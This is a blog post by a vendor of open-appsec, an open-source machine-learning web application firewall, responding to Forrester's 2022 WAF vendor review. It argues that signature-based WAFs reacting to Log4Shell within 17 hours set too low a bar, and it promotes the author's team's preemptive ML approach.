17 hours to react to zero-day threats -- good enough? A perspective on Forrester’s WAF Vendors Wave
On September 27th, 2022 Forrester released a WAF vendor review, “The 12 Providers That Matter Most and How They Stack Up.” The report analyzes various aspects of vendors’ WAF offerings, including the quality of dealing with Attacks, Configuration and Management, Product Vision, Support and other criteria.
A special focus of the review is given to how vendors dealt with the well-known Log4Shell zero-day attack in late 2021, a security event that kept many people in the IT industry working around the clock for days.
The Forrester report and some vendor follow-up comments offer an interesting demonstration of today’s expectations from WAF solutions and the bar that sets, especially regarding zero-days. They imply it is acceptable to have solutions many hours, and even days, after vulnerabilities are known.
Yet in other security domains, such as anti-malware and email security, the expectation today is for real-time and preemptive threat prevention. I want to raise some concerns about WAF security today and provide some possible solutions to raise the bar on what we should expect. Attackers are acting quickly. We can't afford waiting hours and hours until we can react to threats…
Zero-days and Vulnerability Windows
A zero-day attack or zero-day exploit leverages an unknown vulnerability in either hardware or software. It's called a zero-day because at the point at which the exploit is discovered, developers have had "zero days" to implement a fix for the underlying vulnerability.
Attackers take advantage of the window between the discovery of a new vulnerability until it is mitigated. They quickly implement exploits and automated scripts and look for targets. This happens within hours.
CloudFlare CEO tweet shortly after Log4Shell Zero-Day hit the news:
Today’s low bar for WAF solution response times
We cannot provide excerpts from the full report (it is available for download after payment), but a blog issued by Forrester after publishing the report, is an interesting demonstration for today’s low bar of expectations from WAF solutions, especially around zero-days.
“Vendors responded quickly to Log4Shell issues. Log4Shell was an avalanche of panic and work for security pros last year, and with WAF as one of the key defense points, we wondered how quickly vendors were able to help their customers and how well they communicated. It was a pleasant surprise to see that top vendors had issued new rules within hours or by the next day, posting regular blogs with updates and even hosting events to help customers understand the issues. Customer references were uniformly pleased with their vendors’ responses.”
CloudFlare, a truly great technology and cloud service company, one of the two selected Leaders (the second one is Akamai) of the Forrester reports, write in their triumph blog:
“We believe that we scored the highest possible score in the Log4Shell criterion due to our fast response to the announcement, by ensuring that all customers using the Cloudflare WAF were protected against the exploit in less than 17 hours globally.
In the following weeks from the initial announcement, we updated WAF rules several times following discovery of multiple variations of attack payloads”
From my perspective, we should not be celebrating a 17-hour response time. We should be relentlessly searching for better solutions.
WAF Solutions and Signatures
The Forrester review mentions 12 vendors and uses an inclusion criteria of:
· A comprehensive, enterprise class WAF offering
· Support for hybrid-cloud and multi-cloud application deployments
· $20M or more in global WAF revenue
All leading WAF solutions today, including the 12 mentioned in Forrester report and others, are based of Signatures, which became very popular with ModSecurity and Core-Rule-Set (CRS) and served the industry well in the last 20 years.
Signature-based solutions are well-proven, but they are reactive by nature, meaning that often signatures aren't available until after vulnerabilities have been known for some time and exploits are put into circulation. As such, they provide insufficient response for modern, fast-spreading attacks such as Log4Shell.
As you can see in the table below, all the noted WAF vendors issued signatures only after the Log4J attack was published:
AWS WAF - https://aws.amazon.com/security/security-bulletins/AWS-2021-005/
Azure WAF - https://msrc-blog.microsoft.com/2021/12/11/microsofts-response-to-cve-2021-44228-apache-log4j2/
Cloudflare WAF - https://blog.cloudflare.com/cve-2021-44228-log4j-rce-0-day-mitigation/
Imperva WAF - https://www.imperva.com/blog/how-were-protecting-customers-staying-ahead-of-cve-2021-44228/
Radware WAF - https://support.radware.com/app/answers/answer_view/a_id/1029778/~/how-to-apply-signatures-for-protection-from-the-cve-2021-44228-log4j
Barracuda WAF and WAFaaS - https://blog.barracuda.com/2021/12/13/barracuda-waf-and-waf-as-a-service-protect-against-the-apache-log4j-critical-vulnerability/
F5 NGINX App Protect - https://www.nginx.com/blog/mitigating-the-log4j-vulnerability-cve-2021-44228-with-nginx/?utm_medium=owned-social&utm_source=linkedin&utm_campaign=ww-nx_ssap_g
F5 BIG-IP ASM/Advanced WAF - https://support.f5.com/csp/article/K19026212
Akamai WAF - https://www.akamai.com/blog/news/CVE-2021-44228-Zero-Day-Vulnerability
Fortinet FortiWeb - https://www.fortiguard.com/updates/websecurity?version=0.00305
ModSecurity - https://www.reddit.com/r/AskNetsec/comments/rdz43x/looking_for_modsecurity_rules_to_block_log4j_rce/
Palo Alto Networks WAAS - https://www.paloaltonetworks.com/blog/prisma-cloud/log-4-shell-vulnerability/
Reblaze - https://www.reblaze.com/blog/cloud-security/securing-a-critical-apache-log-vulnerability/
Fastly - https://www.fastly.com/blog/digging-deeper-into-log4shell-0day-rce-exploit-found-in-log4j
Wallarm - https://lab.wallarm.com/cve-2021-44228-mitigation-update/
Citrix WAF - https://www.citrix.com/blogs/2021/12/13/guidance-for-reducing-apache-log4j-security-vulnerability-risk-with-citrix-waf/
Kemp - https://support.kemptechnologies.com/hc/en-us/articles/4416473820045
Cisco Talos - https://blog.talosintelligence.com/2021/12/apache-log4j-rce-vulnerability.html
Preemptive Protection against Zero Day Attacks
I think that we need to change expectations and provide security that prevents attacks, instead of only chasing them. Preemptive protection against cyber attacks is critical because vulnerabilities may have been known by bad actors before they were announced in public, and because it naturally takes time for administrators to patch the holes, creating a security risk that’s known as a “vulnerability window”.
Source: Cambridge Dictionary
Using machine learning techniques, it is possibly today to block attacks such as Log4Shell pre-emptively and automatically without need for signature updates.
open-appsec, an open-source project developed by our team, uses contextual analysis to learn how users normally interact with your web application. It then uses this information to automatically detect requests that fall outside of normal operations, and sends those requests for further analysis to decide whether the request is malicious or not. This preemptive model removes the risk of a vulnerability window, and eliminates the need for rushed patching activities.
The engine is powered by two different machine learning models:
A supervised model that was trained offline and fed with millions of requests, both malicious and benign.
An unsupervised online model that is being built in real time in the protected environment. The online model is updated constantly based on inbound network traffic.
In the case of Log4j, open-appsec had several indicators in the supervised ML model from Command Injection / Remote Code Execution / Probing families that signaled payloads to be malicious with a very high score, which resulted in automatically blocking the attack. A similar finding and blocking happened with the Spring4Shell Zero Day few months later.
To our knowledge, open-appsec and CloudGuard AppSec (which share the same engine) were the only WAF solutions in the market able to preemptively block Log4Shell attacks, including later variants, without software updates and using default product settings. See here the original posting from December 14th, 2021 with a detailed technical explanation.
Preemptive protection against cyber attacks is critical because vulnerabilities may have been known by bad actors before publication and because it naturally takes time for everyone to patch them, also known as “vulnerability window”.
The Forrester report and some vendor commentaries provide an interesting demonstration of today’s low bar of exceptions for WAF solutions, especially around zero-days. Unfortunately, it is considered acceptable to have solutions many hours and even days after vulnerabilities are known.
I think that it’s time to raise the bar, similar to how anti-malware was improved for example, by looking for solutions that use preemptive models by default. With widespread, scaled use, a preemptive ML approach can eliminate a bulk of threats that disrupt organizations, consume IT and security resources, and present excessive risk.
In today's environment of tested and proven ML, there is no reason to rely on outdated technology and accept low expectations for protection. Rather than celebrate 17-hour response times, let’s work together to remove the need for response times altogether.